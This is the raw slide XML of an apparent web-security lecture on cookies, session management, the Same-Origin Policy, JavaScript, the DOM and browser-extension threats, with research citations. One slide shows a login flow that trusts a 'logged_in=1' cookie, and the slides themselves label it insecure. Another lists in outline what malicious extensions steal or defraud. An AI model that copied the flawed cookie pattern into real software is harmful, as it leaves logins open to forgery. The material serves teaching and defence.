              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2182" dirty="0"/>
              <a:t>Often used for identification, authentication, user tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="303152" indent="-303152" defTabSz="398428">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2182" dirty="0"/>
              <a:t>Attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="606304" lvl="1" indent="-303152" defTabSz="398428">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2182" dirty="0"/>
              <a:t>Domain and path restricts resources browser will send cookies to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="606304" lvl="1" indent="-303152" defTabSz="398428">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2182" dirty="0"/>
              <a:t>Expiration sets how long cookie is valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="606304" lvl="1" indent="-303152" defTabSz="398428">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2182" dirty="0" smtClean="0"/>
              <a:t>Additional security restrictions (added much later): </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2182" dirty="0" err="1" smtClean="0"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2182" dirty="0"/>
              <a:t>, Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="303152" indent="-303152" defTabSz="398428">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2182" dirty="0"/>
              <a:t>Manipulated by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2182" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Set-Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2182" dirty="0">
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2182" dirty="0" smtClean="0">
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2182" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2182" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2182" dirty="0"/>
              <a:t> headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69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Extensions are given a great deal of power</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May violate SOP restrictions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May access data from any origin (i.e. arbitrary cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May inject code and data into any page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May inspect or modify in-flight network requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some browsers require users to give permissions to extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For Chrome, specified in the “permissions” field in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>manifest.json</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On install, users are asked if they want to grant these permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most users don’t know or care and just click yes :(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security related headers like CSP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Configure the browser to use an insecure proxy or VPN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Information theft: passwords, session cookies, key presses, form data (e.g. credit cards), in-page data (e.g. bank account numbers), etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click fraud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ad Manipulation: replace the ads on a website with ads that payout to the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Affiliate fraud: modify shopping URL (e.g. Amazon) to include the attacker’s affiliate ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Social network abuse: automatically friend/follow accounts, tweet spam messages,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papers try to enforce security restrictions on extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Securing Legacy Firefox Extensions with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SENTINEL”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firefox extensions used to have unrestricted access to all browser APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SENTINEL intercepts privileged API calls and allows the user to set policies that allow/deny these requests per-extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use static/dynamic analysis to discover malicious extensions ahead-of-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Hulk: Eliciting Malicious Behavior in Browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extensions”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firefox and Chrome have both moved to an app store model for extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google uses the Hulk dynamic analysis tool to probe extensions and uncover malicious behavior before they are allowed into the app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Dom-based XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>example courtesy of OWASP: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www.owasp.org/index.php/DOM_Based_XSS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CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>discussion courtesy of HTML5Rocks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.html5rocks.com/en/tutorials/security/content-security-policy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Why is CSP Failing? Trends and Challenges in CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Adoption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>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wkr.io/assets/publications/raid2014csp.pdf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Page Redder Chrome extension example code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developer.chrome.com/extensions/samples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Securing Legacy Firefox Extensions with Sentinel: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://wkr.io/assets/publications/dimva2013sentinel.pdf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Hulk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Eliciting Malicious Behavior in Browser Extensions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://cs.ucsb.edu/~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>kapravel/publications/usenix2014_hulk.pdf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Side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11487" y="2767964"/>
            <a:ext cx="3859415" cy="378074"/>
            <a:chOff x="4401624" y="3387776"/>
            <a:chExt cx="3859415" cy="37807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GET /login_form.html </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>HTTP/1.0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1487" y="3304476"/>
            <a:ext cx="3859415" cy="386817"/>
            <a:chOff x="4370185" y="3387776"/>
            <a:chExt cx="3859415" cy="38681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77844" y="3387776"/>
              <a:ext cx="1808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HTTP/1.0 200 OK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1486" y="3929448"/>
            <a:ext cx="3859415" cy="378074"/>
            <a:chOff x="4401624" y="3387776"/>
            <a:chExt cx="3859415" cy="37807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945584" y="3387776"/>
              <a:ext cx="28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POST /cgi/login.sh </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>HTTP/1.0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11485" y="4548501"/>
            <a:ext cx="3859415" cy="709300"/>
            <a:chOff x="4370185" y="3387776"/>
            <a:chExt cx="3859415" cy="38681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78833" y="3387776"/>
              <a:ext cx="2606226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HTTP/1.0 302 Found</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>Set-Cookie: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
                <a:t>logged_in</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>=1;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11484" y="5482902"/>
            <a:ext cx="3859415" cy="686101"/>
            <a:chOff x="4401624" y="3469443"/>
            <a:chExt cx="3859415" cy="29640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98179" y="3469443"/>
              <a:ext cx="3367524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GET /private_data.html HTTP/1.0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>Cookie: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
                <a:t>logged_in</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>=1;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangular Callout 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757830" y="5257801"/>
            <a:ext cx="3460865" cy="1322174"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 101518"/>
              <a:gd name="adj2" fmla="val -562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This is a terrible, insecure way to implement login cookies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Session Cookie Example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892" indent="-392892" defTabSz="406644">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2227" dirty="0"/>
              <a:t>Client submits login credentials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/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2227" dirty="0"/>
              <a:t>App validates credentials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/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2227" dirty="0"/>
              <a:t>App generates and stores a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2227" dirty="0" smtClean="0"/>
              <a:t>cryptographically secure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227" dirty="0" smtClean="0"/>
              <a:t>session </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227" dirty="0"/>
              <a:t>identifier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 dirty="0"/>
              <a:t>e.g., Hashed, encoded nonce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 dirty="0"/>
              <a:t>e.g., HMAC(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227" dirty="0" err="1"/>
              <a:t>session_id</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227" dirty="0"/>
              <a:t>)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 startAt="4"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2227" dirty="0"/>
              <a:t>App uses </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Set-Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227" dirty="0"/>
              <a:t> to set session ID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 startAt="4"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2227" dirty="0"/>
              <a:t>Client sends session ID as part of subsequent requests using </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:endParaRPr sz="2227" dirty="0"/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 startAt="4"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2227" dirty="0"/>
              <a:t>Session dropped by cookie expiration or removal of server-side session record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18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774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Session Cookies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Advantages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Flexible – authentication delegated to app </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>layer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t> (vs. HTTP Authentication)</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Support for logout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Large number of ready-made session management frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Disadvantages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Flexible – authentication delegated to app layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Session security depends on secrecy, unpredictability, and tamper-evidence of cookie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8698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has become a powerful platform for developing and distributing applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Huge user population</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Relatively easy to develop and deploy cross-platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Platform has evolved significantly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Very simple model initially</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Today, it is a mix of client- and server-side components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web services and APIs are now ubiquitous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Geared towards an open model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On the client-side, all documents, data, and code are visible/modifiable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Commonplace to link to or share data/code with other (untrusted)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origin may set cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Objects from embedded resources may also set cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="312528" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0" algn="ctr">
              <a:buNone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“http://www.images.com/cats/adorablekitten.jpg"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312528" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When the browser sends an HTTP request to origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, which cookies are included?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only cookies for origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> that obey the specific path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912059"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="376974" indent="-386715" defTabSz="508254">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3184" dirty="0" smtClean="0"/>
              <a:t>The Same-Origin Policy (SOP) states that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3184" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3184" dirty="0" smtClean="0"/>
              <a:t> from one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3184" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3184" dirty="0" smtClean="0"/>
              <a:t> cannot access objects from another origin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SOP is the basis of classic web security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Some exceptions to this policy, as we will see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SOP has been relaxed over  time to make controlled sharing easier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="376974" indent="-386715" defTabSz="508254">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3184" dirty="0" smtClean="0"/>
              <a:t>In the case of cookies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Domains are the origins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Cookies are the subjects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2784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19318" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1995: JavaScript introduced with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Netscape </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Navigator 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Netscape allowed Java plugins to be embedded in webpages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Designed to be a lightweight alternative to Java for beginners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No relationship to Java, other than the name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1996: Microsoft introduces JScript and VBScript with IE 3.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JScript was similar, but not identical to, JavaScript (embrace, extend, extinguish)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JavaScript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7526" indent="-287526" defTabSz="377890">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2070"/>
              <a:t>Language for browser scripting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Developed by Brendan Eich for Netscape in 10 days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Now used server-side, embedded in documents like PDFs, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287526" indent="-287526" defTabSz="377890">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2070"/>
              <a:t>Features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Dynamic, weakly-typed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Prototype-based inheritance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First-class functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287526" indent="-287526" defTabSz="377890">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2070"/>
              <a:t>Many frameworks for abstracting the DOM (jQuery), templating and view management (angular), visualization (d3js)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39463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JavaScript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Inline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="416703" lvl="1" indent="-104176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onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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doSomething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();"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&gt;&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D7391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Embedded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="416703" lvl="1" indent="-104176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alert(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'Hello'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sz="2250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External</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="416703" lvl="1" indent="-104176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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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25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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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js</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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/main.js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6520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JavaScript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61114" cy="4351338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n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'what'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(x, y)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y;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'foo'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'bar'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obj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op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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 391"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6102219" y="1825625"/>
            <a:ext cx="5391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57">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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250" b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fn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="225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50" b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(msg) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="321457">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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25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...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="225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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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indent="0" defTabSz="321457">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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25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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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addEventListener(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="225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'click'</a:t>
            </a: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fn, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" b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false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="225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3735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Document Object Model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Provides an API for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>accessing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>state and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>frame contents</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Accessible via JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Browser state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Document, windows, frames, history, location, navigator (browser type and version)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Properties – e.g., links, forms, anchors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Methods to add, remove, modify </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>elements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smtClean="0"/>
